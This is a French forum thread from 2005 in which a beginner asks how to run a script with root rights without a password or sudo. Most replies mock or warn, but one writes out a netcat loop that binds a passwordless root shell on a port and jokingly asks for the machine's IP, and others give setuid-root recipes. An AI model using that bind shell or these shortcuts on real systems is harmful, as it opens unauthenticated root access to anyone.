[ksh] Utiliser des droits root sans l'être
Utiliser des droits root sans l'être [ksh] - Codes et scripts - Linux et OS Alternatifs
Marsh Posté le 16-11-2005 à 10:19:16
je ne peux pas installer sudo, c'est pour cela que je cherche une autre solution...quelqu'un a une idée???
Marsh Posté le 16-11-2005 à 10:37:21
tu peux pas installer sudo ? pourquoi 
non passke sinon, tu peux passer tous tes exécutables en suid-root ! ![[:ddr555]](https://forum-images.hardware.fr/images/perso/ddr555.gif "[:ddr555]")
l'avantage c'est que c'est pas dangereux du tout ! 
![[:minusplus]](https://forum-images.hardware.fr/images/perso/minusplus.gif "[:minusplus]")
Marsh Posté le 16-11-2005 à 14:41:30
Et c'est compliqué à mettre en place SUDO?????
comment on installe ça???
Marsh Posté le 16-11-2005 à 14:44:14
attends (1) tu peux ou tu peux pas l'installer ? si tu peux pas l'installer ça va être impossible de l'installer hein... (ce qu'on est pas obligé de dire ici... 
)
(2) c'est quoi ta distribution linux ?
Marsh Posté le 16-11-2005 à 15:23:52
| heaven35 a écrit : Bonjour à tous, |
Tout ça ne me dit rien qui vaille.
Mais rions un peu. Un programme python qui écoute sur un port fera très bien l'affaire. Tu le lances avec les droits root et il se charge de réécire et exécuter la commande que tu lui passes.
Et pourquoi tu ne peux pas installer sudo ? parce que tu n'est pas root ?
Message édité par roscocoltran le 16-11-2005 à 15:24:29
Marsh Posté le 16-11-2005 à 15:32:22
| roscocoltran a écrit : |
un rootkit koi...
Marsh Posté le 16-11-2005 à 15:38:36
moi je vote pour un:
while [ 1 ] ; do netcat -e /bin/bash -l -p 4242 ; done
tu lances ça en root... et voilà ! tu n'as plus qu'à te connecter avec netcat:
netcat localhost 4242
et tu as un shell root sans jamais taper de mot de passe !
ensuite, oublies pas d'envoyer l'adresse IP publique (si yen a une...) de cette machine, qu'on puisse vérifier que ça marche bien !
Marsh Posté le 16-11-2005 à 15:44:05
ou file-nous le mot de passe root directement, on peut te faire ça à distance pour pas cher.
Marsh Posté le 16-11-2005 à 18:06:52
ok les gars...merci je vois. Bon bas je vais faire le forcing pour sudo...je vous recontacterais pour m'aider à la configurer )
Marsh Posté le 16-11-2005 à 18:36:18
---------------
uptime is for lousy system administrators what Viagra is for impotent people - mes unixeries - github me
Marsh Posté le 17-11-2005 à 06:45:33
Tu peux créer un petit binaire setuid root qui ne fais rien d'autre qu'exécuter ton script. En fait si ton script a les droits 700, et si ton binaire appartient à un utilisateur (pas root) et a les droits 4700, c'est pas trop dangereux comme solution : tu es le seul à pouvoir exécuter le binaire, et root est le seul a pouvoir exécuter le script.
Edit : en fait en y repensant c'est même probablement la solution la plus sure (à condition que tu saches faire un programme C de quelques lignes sans faille de sécurité). A la limite c'est même plus sûr que sudo, qui revient finalement au même (sudo est setuid root), mais qui est infiniment plus compliqué et a plus de chances d'être buggué.
Message édité par matafan le 18-11-2005 à 04:50:57
Marsh Posté le 25-11-2005 à 09:50:30
Bonjour je voudrais devenir hacker sans connaitre unix vous pouvez m'aider ?
Juste pour rester dans l'esprit de ce topic fort lolesque.
![[:spamafote]](https://forum-images.hardware.fr/images/perso/spamafote.gif "[:spamafote]")
Marsh Posté le 26-11-2005 à 15:38:02
| heaven35 a écrit : Je cherche à écrire un script qui me permettrait de killer des process ou d'effectuer des rm sur des fichiers/dossiers qui ne m'appartiennent pas. Pour cela il me faut des droits root. |
Déjà, oublie le script et fais un programme en C (sans être loggé en root). Compile-le (avec gcc) et tu obtiens un fichier binaire (par binaire, je veux dire : "contenant des instructions directement compréhensibles par le processeur" ). Ensuite, tu te logges en root (commande : su) et tu fais appartenir fichier_binaire à root (commande : chown root fichier_binaire). Ensuite, tu fais en sorte que lorsque le noyau fait un exec de fichier_binaire, il modifie le propriétaire du processus (qui a demandé l'exec) en lui affectant le propriétaire de fichier_binaire (commande : chmod +s fichier_binaire). Tu n'as plus besoin d'être root : fermer le flux en appuyant sur [Ctrl]+[D]. Ca devrait marcher !
Pourquoi faire absolument un fichier binaire ? Lorsque le noyau fait un exec, c'est forcément un exec d'un fichier binaire. Si tu exécutes un script, le noyau va faire un exec de l'interpréteur de commandes capable de comprendre le script. Dans ton cas, il fera sûrement un exec de bash, qui ne va évidemment pas te donner les droits du root.
Message édité par e-miel le 26-11-2005 à 17:20:51
Sujets relatifs:
- [gnuplot et debian ] l'utiliser avec SSH pour tracer une courbe ?
- Win/linux: Gestion des utilisateurs, groupes, droits, authentification
- [Solaris] Java ne se lance quand root
- [VoIP] Utiliser SIP plutôt qu'un protocole propriétaire ;-)
- ifconfig sans le root
- Est-ce normal de ne pas pouvoir se logger en root avec Putty?
- [Mandrake 10.1] su root refusé depuis un autre compte
- [linux k2.6]Usb device - droits d'accès automatiques sur /dev/mydevice
- Suse 9.3 pb de droits sur un disque
- red hat 9 et droits d'accès
Marsh Posté le 16-11-2005 à 09:14:42
Bonjour à tous,
Débutant, je cherche à écrire un script qui me permettrait de killer des process ou d'effectuer des rm sur des fichiers/dossiers qui ne m'impartiennet pas. Pour cela il me faut des droits root. Pour le moment pas de problème.
Si j'utilise un su, on me demande le mot de passe root. Voilà le début des soucis. Je ne veux pas que la demande du mot de passe root est lieu. Il faudrait que ce soit transparent.
Quelqu'un aurait une idée pour me dépanner???
P.S : je ne souhaite pas non plus utilisé SUDO...( ça complique les choses, non?? )